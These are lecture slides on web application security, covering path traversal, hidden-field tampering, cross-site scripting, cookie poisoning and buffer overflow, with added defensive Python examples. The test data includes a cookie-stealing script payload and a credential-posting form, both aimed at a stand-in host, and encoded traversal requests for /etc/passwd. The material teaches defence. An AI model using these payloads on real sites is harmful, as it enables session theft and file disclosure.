
Security of Web Applications





1. Security of Web Applications
Jamshid Shokrollahi, E-Commerce Security

2. Overview
• Why Web application security?
• Some attacks on web applications and corresponding countermeasures

3. Why Web application security?
• Reduce cost of recovery and fixes
• Ensure customer trust
• Encourage website adoption
• Maintain competitive advantages
• Manage legal risks

4. Some attacks on Web Applications
• Known vulnerabilities and misconfigurations
• Hidden fields
• Backdoor and debug options
• Cross-site scripting
• Cookie poisoning
• Buffer overflow

5. Known vulnerabilities and misconfigurations
• October 2000: Microsoft's IIS
• A malformed URL lets a malicious user navigate the logical drive of the web server.
• The request runs under the security context of IUSR_machinename, the anonymous account for IIS, which belongs to the Everyone and Guests groups.
• Security Bulletin MS00-078: "… in IIS 4.0 and 5.0, a particular type of malformed URL … enables a malicious user ... to add, change or delete data, run code already on the server, or upload new code to the server and run it. …"
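The countermeasure to the class of flaw described on this slide is to decode and canonicalise the requested path on the server and refuse anything that resolves outside the web root. The following is an added example, not code from the presentation: it assumes a constructed web root of /var/www/site and performs a purely lexical check, so it runs without touching the filesystem.

```python
import posixpath
from urllib.parse import unquote

# Constructed web root for the example; the check is lexical only.
WEB_ROOT = "/var/www/site"


def _resolve(relative: str, web_root: str) -> tuple:
    """Join a relative path onto web_root and report whether it stays inside."""
    candidate = posixpath.normpath(posixpath.join(web_root, relative))
    inside = candidate == web_root or candidate.startswith(web_root + "/")
    return inside, candidate


def resolve_request_path(url_path: str, web_root: str = WEB_ROOT):
    """Map a URL path onto a filesystem path under web_root.

    Returns the resolved path, or None when the request would escape the
    web root. The path is percent-decoded once for the lookup and a second
    time for the check, so that double-encoded separators (e.g. %252e%252e)
    cannot slip past the test; backslashes are treated as separators.
    """
    path_only = url_path.split("?", 1)[0]
    once = unquote(path_only).replace("\\", "/").lstrip("/")
    twice = unquote(once).replace("\\", "/").lstrip("/")
    # Both decoding levels must stay inside the root; the lookup uses the
    # singly decoded form, which is what a literal '%' in a name requires.
    inside_once, candidate = _resolve(once, web_root)
    inside_twice, _ = _resolve(twice, web_root)
    if not (inside_once and inside_twice):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed request paths: ordinary, and several traversal attempts.
    for req in ["/index.html", "/docs/../index.html", "/../../etc/passwd",
                "/..%2f..%2fetc/passwd", "/images/..\\..\\secret",
                "/%252e%252e/%252e%252e/etc/passwd"]:
        print(f"{req!r:45} -> {resolve_request_path(req)}")
```

Paths that merely move around inside the root (such as /docs/../index.html) are still served; anything that climbs above it, whether written plainly, with backslashes, or percent-encoded once or twice, is rejected before any file access happens.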

6. Tampering with hidden fields
• Hidden fields in forms could contain passwords or prices which must be submitted back to the server.
• They can be viewed or modified by clients and submitted back.

7. Tampering with hidden fields
[Diagram: the web server sends the web user a form to be filled in for an order, with unit prices carried as hidden fields; the user reduces the unit prices and submits the form; the web server passes the wrong order on to the database server.]
• The forms should be validated and passwords should not be sent to the clients.
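The validation the slide calls for means treating every price the client sends back as untrusted and recomputing the order from the server's own catalogue. The following is an added example, not code from the presentation: the catalogue, SKUs and form layout are constructed for illustration.

```python
from decimal import Decimal, InvalidOperation

# Constructed server-side catalogue: the only trusted source of unit prices.
CATALOGUE = {
    "sku-100": Decimal("49.90"),
    "sku-200": Decimal("5.00"),
}


def price_order(form: dict) -> tuple:
    """Compute an order total from a submitted form.

    form["items"] is a list of dicts with 'sku', 'qty' and a client-supplied
    'price' (the hidden field). The submitted price is never used for the
    total; it is only compared against the catalogue so that tampering can
    be logged. Returns (total, tampered_skus). Raises ValueError for an
    unknown SKU or a non-positive / malformed quantity.
    """
    total = Decimal("0")
    tampered = []
    for item in form.get("items", []):
        sku = item.get("sku")
        if sku not in CATALOGUE:
            raise ValueError(f"unknown sku {sku!r}")
        try:
            qty = int(item.get("qty", ""))
        except ValueError:
            raise ValueError(f"bad quantity for {sku}")
        if qty <= 0:
            raise ValueError(f"bad quantity for {sku}")
        unit_price = CATALOGUE[sku]
        # Compare, but do not trust, what the client sent back.
        try:
            submitted = Decimal(str(item.get("price", "")))
        except InvalidOperation:
            submitted = None
        if submitted != unit_price:
            tampered.append(sku)
        total += unit_price * qty
    return total, tampered


if __name__ == "__main__":
    # Constructed submission in which the hidden price of sku-100 was lowered.
    submission = {"items": [
        {"sku": "sku-100", "qty": "2", "price": "0.01"},
        {"sku": "sku-200", "qty": "1", "price": "5.00"},
    ]}
    total, tampered = price_order(submission)
    print(f"total={total} tampered={tampered}")
```

Because the unit price is looked up server-side, the hidden field becomes informational at most; the mismatch list gives the operator a signal worth alerting on, since an honest browser resubmits exactly the values it was given.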

8. Backdoor and debug options
• Backdoor options are built into applications during debugging.
• Programmers build shortcuts to avoid logging in for every round of debugging.
• Because of time limits, debugging versions are put on the web.

9. Threats caused by scripts
• CERT Advisory CA-1997-20
  – Impact: Enables monitoring web activities
  – Cause: Vulnerabilities in browsers (JavaScript)
  – Solution: upgrade browser or disable JavaScript
• CERT Vulnerability Note VU#800893
  – Impact: Disclosing files
  – Cause: Vulnerability in the implementation of GetObject in IE (VBScript)
  – Solution: download patch or disable active scripting in IE, especially when visiting untrusted sites.

10. Cross-site scripting
• Hope browsers are not patched
• Put malicious code on innocent web pages
• Submit texts including: <SCRIPT>malicious code</SCRIPT>; others download the code
• Abuse of <FORM> tag
• Internet Explorer security "zones" can be subverted by this technique
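The slide's attack works because submitted text is written back into a page unchanged. The defensive counterpart, encoding every user-supplied value for the HTML context it lands in, is shown below as an added example that is not part of the presentation; the comment-rendering function and its page layout are constructed for illustration.

```python
import html
import re

# Matches an opening or closing <script ...> tag in raw HTML, case-insensitively.
SCRIPT_TAG_RE = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def render_comment_unsafe(author: str, text: str) -> str:
    """The vulnerable pattern: user text pasted straight into the page."""
    return f'<p class="comment"><b>{author}</b>: {text}</p>'


def render_comment(author: str, text: str) -> str:
    """The hardened pattern: every user-supplied value is HTML-escaped.

    html.escape converts <, >, &, ' and " to entities, so a submitted
    <SCRIPT> or <FORM> tag is displayed as text rather than parsed as markup.
    quote=True (the default) also makes the value safe inside a quoted attribute.
    """
    return (
        f'<p class="comment" data-author="{html.escape(author)}">'
        f'<b>{html.escape(author)}</b>: {html.escape(text)}</p>'
    )


def contains_script_tag(fragment: str) -> bool:
    """Detection helper: does this HTML fragment carry a live <script> tag?"""
    return bool(SCRIPT_TAG_RE.search(fragment))


if __name__ == "__main__":
    # Constructed submissions: a harmless one and two of the kinds named on the slide.
    samples = [
        ("alice", "Nice article!"),
        ("mallory", "<SCRIPT>document.location='http://example.invalid/?'+document.cookie</SCRIPT>"),
        ("mallory", '<FORM action="http://example.invalid/steal"><INPUT name=pw></FORM>'),
    ]
    for author, text in samples:
        print("unsafe :", contains_script_tag(render_comment_unsafe(author, text)))
        print("escaped:", contains_script_tag(render_comment(author, text)))
        print(render_comment(author, text))
```

The same escaping is needed wherever untrusted text is interpolated, including attribute values, which is why the hardened version escapes the author name twice, once per context it appears in. Escaping at output time, rather than trying to strip tags on input, is what keeps the defence independent of which tag or casing the submitter chose.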

11. Cookie-based attacks
• Like the hidden field attack, when parameters are saved in cookies.
• Packet sniffing to steal identities which are saved in cookies.
• Countermeasure: using digital signatures and cryptography.
• Using cross-site scripting (CSS) to send cookies to other servers; here even cryptography does not help.
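The slide's countermeasure for cookie poisoning is to authenticate the cookie's contents so that an edited value is detected on its return. The following is an added example, not code from the presentation: it signs a cookie payload with an HMAC (a keyed message authentication code standing in for the slide's "digital signatures and cryptography"), using a constructed server key and payload.

```python
import base64
import hashlib
import hmac
import json

# Constructed server-side secret; in practice this is generated at deployment
# and never sent to the client.
SERVER_KEY = b"constructed-example-key-do-not-reuse"


def sign_cookie(payload: dict, key: bytes = SERVER_KEY) -> str:
    """Encode payload as base64 JSON and append an HMAC-SHA256 tag."""
    body = base64.urlsafe_b64encode(
        json.dumps(payload, sort_keys=True).encode()
    ).decode()
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def verify_cookie(cookie: str, key: bytes = SERVER_KEY):
    """Return the payload if the tag matches, otherwise None.

    The comparison is constant-time, and the body is only decoded after the
    tag has been verified, so an attacker cannot feed the server modified
    data (e.g. a changed price or user id) without knowing the key.
    """
    try:
        body, tag = cookie.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    try:
        return json.loads(base64.urlsafe_b64decode(body))
    except (ValueError, json.JSONDecodeError):
        return None


def tamper_with_body(cookie: str, new_payload: dict) -> str:
    """Constructed helper: swap the body but keep the old tag, as a client would."""
    _, tag = cookie.rsplit(".", 1)
    body = base64.urlsafe_b64encode(
        json.dumps(new_payload, sort_keys=True).encode()
    ).decode()
    return f"{body}.{tag}"


if __name__ == "__main__":
    original = sign_cookie({"user": "alice", "discount": 0})
    forged = tamper_with_body(original, {"user": "alice", "discount": 90})
    print("original verifies:", verify_cookie(original))
    print("forged verifies  :", verify_cookie(forged))
```

Note what the tag does and does not give: it stops the hidden-field-style edit of a cookie value, but the signed cookie is still a bearer token. A copy captured by packet sniffing, or exfiltrated by cross-site scripting as the slide's last bullet describes, verifies just as well for the thief, which is why the slide says cryptography does not help against that case and why session cookies also need transport protection and short lifetimes.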

12. Buffer overflow
• Some kind of denial of service attacks
• Malicious users can sometimes run their own program
• Overwriting the stack with the address of their programs

13. Bibliography
• Gunter Ollmann, HTML Code Injection and Cross-site scripting, http://www.technicalinfo.net/papers/CSS.html
• CERT Advisory CA-2000-02, Malicious HTML Tags Embedded in Client Web Requests, http://www.cert.org/advisories/CA-2000-02.html
• Wikipedia
